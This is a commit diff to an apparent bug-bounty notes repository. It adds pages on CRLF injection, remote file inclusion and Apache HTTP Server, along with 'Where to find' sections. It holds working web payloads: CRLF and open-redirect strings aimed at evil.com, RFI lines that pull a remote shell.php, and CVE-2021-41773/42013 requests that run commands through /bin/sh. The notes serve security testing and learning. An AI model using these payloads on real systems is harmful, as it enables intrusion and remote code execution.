Add 'Where to find' in each readme, add Apache + CRLF + RFI
parent
fdaf048f40
commit
abd025fb64
|
@ -1,5 +1,13 @@
|
|||
# Bypass File Upload
|
||||
1. Change the ContentType
|
||||
# Arbitrary File Upload
|
||||
|
||||
## Introduction
|
||||
An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.
|
||||
|
||||
## Where to find
|
||||
In upload file feature, for example upload photo profile feature
|
||||
|
||||
## How to exploit
|
||||
1. Change the `Content-Type` value
|
||||
```
|
||||
POST /images/upload/ HTTP/1.1
|
||||
Host: target.com
|
||||
|
|
|
@ -3,7 +3,10 @@
|
|||
## Introduction
|
||||
Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization.
|
||||
|
||||
## How to find
|
||||
## Where to find
|
||||
This vulnerability can appear in all features of the application.
|
||||
|
||||
## How to exploit
|
||||
1. Review Functionality
|
||||
- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
|
||||
- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Bypass Captcha
|
||||
# Bypass Captcha (Google reCAPTCHA)
|
||||
|
||||
1. Try changing the request method, for example POST to GET
|
||||
```
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
# CRLF Injection
|
||||
|
||||
## Introduction
|
||||
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
|
||||
|
||||
## Where to find
|
||||
It can be found anywhere, always check the request and response. Try to search for parameters that lead to redirects, you can see the response is (301, 302, 303, 307, 308).
|
||||
|
||||
## How to exploit
|
||||
1. Basic payload
|
||||
```
|
||||
https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/
|
||||
```
|
||||
The response is
|
||||
```
|
||||
HTTP/1.1 200 OK
|
||||
Content-Type: text/html
|
||||
Date: Mon, 09 May 2016 14:47:29 GMT
|
||||
Set-Cookie: language=en
|
||||
Location: https://evil.com/
|
||||
```
|
||||
|
||||
2. Double encode
|
||||
```
|
||||
https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/
|
||||
```
|
||||
|
||||
3. Bypass unicode
|
||||
```
|
||||
https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/
|
||||
```
|
||||
|
||||
## References
|
||||
* [@filedescriptor](https://blog.innerht.ml/twitter-crlf-injection/)
|
||||
* [EdOverflow](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md)
|
|
@ -3,6 +3,9 @@
|
|||
## Introduction
|
||||
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
|
||||
|
||||
## How to find
|
||||
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
|
||||
|
||||
## How to exploit
|
||||
1. HTML GET Method
|
||||
|
||||
|
@ -38,3 +41,6 @@ xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
|
|||
xhr.send('{"role":admin}');
|
||||
</script>
|
||||
```
|
||||
|
||||
5. Multipart request
|
||||
Soon
|
|
@ -12,7 +12,10 @@ Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious s
|
|||
|
||||
A type of XSS that has payloads found in the DOM rather than within the HTML code.
|
||||
|
||||
## **How to exploit**
|
||||
## Where to find
|
||||
This vulnerability can appear in all features of the application. If you want to find Dom-based XSS, you can find it by reading the javascript source code.
|
||||
|
||||
## How to exploit
|
||||
1. Basic payload
|
||||
```html
|
||||
<script>alert(1)</script>
|
||||
|
|
|
@ -2,8 +2,11 @@
|
|||
|
||||
## Introduction
|
||||
Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it
|
||||
## How to FInd
|
||||
|
||||
## Where to find
|
||||
This vulnerability can appear in all features of the application. Depending on how to exploit it, for example in the file upload feature, you can upload very large files
|
||||
|
||||
## How to exploit
|
||||
1. Cookie bomb
|
||||
|
||||
```
|
||||
|
|
|
@ -3,7 +3,10 @@
|
|||
## Introduction
|
||||
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
|
||||
|
||||
## How to FInd
|
||||
## Where to find
|
||||
`-`
|
||||
|
||||
## How to exploit
|
||||
1. Exposed Git folder
|
||||
```
|
||||
https://site.com/.git
|
||||
|
|
|
@ -3,6 +3,9 @@
|
|||
## Introduction
|
||||
HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.
|
||||
|
||||
## Where to find
|
||||
In the feature where the website can send email to us. For example forgot password / newsletter.
|
||||
|
||||
## How to exploit
|
||||
1. Change the host header
|
||||
```
|
||||
|
|
|
@ -3,7 +3,11 @@
|
|||
## Introduction
|
||||
IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.
|
||||
|
||||
## How to FInd
|
||||
## Where to find
|
||||
- Usually it can be found in APIs.
|
||||
- Check the HTTP request that contain unique ID, for example `user_id` or `id`
|
||||
|
||||
## How to exploit
|
||||
1. Add parameters onto the endpoints for example, if there was
|
||||
```
|
||||
GET /api/v1/getuser
|
||||
|
|
|
@ -1,8 +1,11 @@
|
|||
## Local File Inclusion
|
||||
## Local File Inclusion (LFI)
|
||||
|
||||
## Introduction
|
||||
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server
|
||||
|
||||
## Where to find
|
||||
- Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html`
|
||||
|
||||
## How to exploit
|
||||
1. Basic payload
|
||||
```
|
||||
|
|
|
@ -3,7 +3,10 @@
|
|||
## Introduction
|
||||
The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account.
|
||||
|
||||
## How to find
|
||||
## Where to find
|
||||
In the SSO feature. For example `Log in with google` or `Log in with facebook`.
|
||||
|
||||
## How to exploit
|
||||
1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses).
|
||||
2. Change Referral header to attacker.com while requesting OAuth.
|
||||
3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials.
|
||||
|
|
|
@ -3,7 +3,11 @@
|
|||
## Introduction
|
||||
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain
|
||||
|
||||
## How to Find
|
||||
## Where to find
|
||||
- Sometimes it can be found in login / register / logout pages
|
||||
- Checking the javascript source code
|
||||
|
||||
## How to exploit
|
||||
1. Try change the domain
|
||||
```
|
||||
/?redir=evil.com
|
||||
|
|
|
@ -9,6 +9,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
## List
|
||||
- [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md)
|
||||
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
|
||||
- [CRLF Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CRLF%20Injection.md)
|
||||
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
|
||||
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
|
||||
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
|
||||
|
@ -17,9 +18,10 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
|
||||
- [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md)
|
||||
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
|
||||
- SQL Injection (SOON)
|
||||
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
|
||||
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
||||
- [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
|
||||
- SQL Injection (SOON)
|
||||
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
||||
|
||||
## List Bypass
|
||||
|
@ -41,6 +43,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
||||
|
||||
## Technologies
|
||||
- [Apache (HTTP Server)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Apache%20HTTP%20Server.md)
|
||||
- [Confluence](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Confluence.md)
|
||||
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
|
||||
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
## Remote File Inclusion (RFI)
|
||||
|
||||
## Introduction
|
||||
Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts.
|
||||
|
||||
## Where to find
|
||||
- Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html`
|
||||
|
||||
## How to exploit
|
||||
1. Basic payload
|
||||
```
|
||||
http://example.com/index.php?page=http://daffa.info/shell.php
|
||||
```
|
||||
|
||||
2. URL encoding
|
||||
```
|
||||
http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php
|
||||
```
|
||||
|
||||
3. Double encoding
|
||||
```
|
||||
http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php
|
||||
```
|
||||
|
||||
4. Using Null Byte (%00)
|
||||
```
|
||||
http://example.com/index.php?page=http://daffa.info/shell.php%00
|
||||
```
|
||||
|
||||
## References
|
||||
* [payloadbox](https://github.com/payloadbox/rfi-lfi-payload-list)
|
|
@ -0,0 +1,42 @@
|
|||
# Apache (HTTP Server) Common Bugs
|
||||
|
||||
## Introduction
|
||||
What would you do if you came across a website that uses Apache (HTTP Server)?
|
||||
|
||||
## How to Detect
|
||||
Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page
|
||||
|
||||
1. Find the related CVE by checking Apache (HTTP Server) version
|
||||
* How to find the Apache (HTTP Server) version
|
||||
|
||||
By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated Apache (HTTP Server) version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/Apache-Http-Server.html)
|
||||
|
||||
Some example CVE:
|
||||
|
||||
- CVE-2021-41773 (RCE and LFI)
|
||||
```
|
||||
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
|
||||
Accept: */*
|
||||
Content-Length: 7
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
echo;id
|
||||
```
|
||||
- CVE-2021-42013 (RCE and LFI)
|
||||
```
|
||||
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 7
|
||||
|
||||
echo;id
|
||||
```
|
|
@ -4,9 +4,7 @@
|
|||
What would you do if you came across a website that uses Confluence?
|
||||
|
||||
## How to Detect
|
||||
```
|
||||
https://example.com/login.action?os_destination=%2F
|
||||
```
|
||||
Try to HTTP request to `https://example.com/login.action?os_destination=%2F` and there is a form login
|
||||
|
||||
1. Find the related CVE by checking Confluence version
|
||||
* How to find the Confluence version
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
What would you do if you came across a website that uses HAProxy?
|
||||
|
||||
## How to Detect
|
||||
-
|
||||
`-`
|
||||
|
||||
1. CVE-2021-40346 (HTTP Request Smuggling)
|
||||
```
|
||||
|
|
|
@ -4,10 +4,7 @@
|
|||
What would you do if you came across a website that uses Jira?
|
||||
|
||||
## How to Detect
|
||||
```
|
||||
https://example.com/secure/Dashboard.jspa
|
||||
https://example.com/login.jsp
|
||||
```
|
||||
Try to HTTP request to `https://example.com/secure/Dashboard.jspa` or `https://example.com/login.jsp` and there is a form login
|
||||
|
||||
1. Find the related CVE by checking jira version
|
||||
* How to find the jira version
|
||||
|
|
|
@ -21,7 +21,41 @@ https://example.com/folder1/folder2/static../static/main.css
|
|||
https://example.com/folder1/folder2/static../%s/main.css
|
||||
```
|
||||
|
||||
3. Nginx status page
|
||||
3. Open redirect
|
||||
This is because of misconfiguration
|
||||
```
|
||||
https://example.com/%5cevil.com
|
||||
https://example.com////\;@evil.com
|
||||
https://example.com////evil.com
|
||||
https://example.com///evil.com
|
||||
https://example.com///evil.com/%2f%2e%2e
|
||||
https://example.com///evil.com@//
|
||||
https://example.com///{{RootURL}}evil.com/%2f%2e%2e
|
||||
https://example.com//;@evil.com
|
||||
https://example.com//\/evil.com/
|
||||
https://example.com//\@evil.com
|
||||
https://example.com//\evil.com
|
||||
https://example.com//\tevil.com/
|
||||
https://example.com//evil.com/%2F..
|
||||
https://example.com//evil.com//
|
||||
https://example.com//evil.com@//
|
||||
https://example.com//evil.com\tevil.com/
|
||||
https://example.com//https://evil.com@//
|
||||
https://example.com/<>//evil.com
|
||||
https://example.com/\/\/evil.com/
|
||||
https://example.com/\/evil.com
|
||||
https://example.com/\evil.com
|
||||
https://example.com/evil.com
|
||||
https://example.com/evil.com/%2F..
|
||||
https://example.com/evil.com/
|
||||
https://example.com/evil.com/..;/css
|
||||
https://example.com/https:evil.com
|
||||
```
|
||||
|
||||
4. Nginx status page
|
||||
```
|
||||
https://example.com/nginx_status
|
||||
```
|
||||
|
||||
## References
|
||||
- [Detectify](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)
|
|
@ -4,7 +4,7 @@
|
|||
What would you do if you came across a website that uses Zend?
|
||||
|
||||
## How to Detect
|
||||
-
|
||||
`-`
|
||||
|
||||
1. Finding config files
|
||||
```
|
||||
|
|
|
@ -3,7 +3,10 @@
|
|||
## Introduction
|
||||
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
|
||||
|
||||
## How to FInd
|
||||
## Where to find
|
||||
`-`
|
||||
|
||||
## How to exploit
|
||||
1. Basic poisoning
|
||||
```
|
||||
GET / HTTP/1.1
|
||||
|
|
Loading…
Reference in New Issue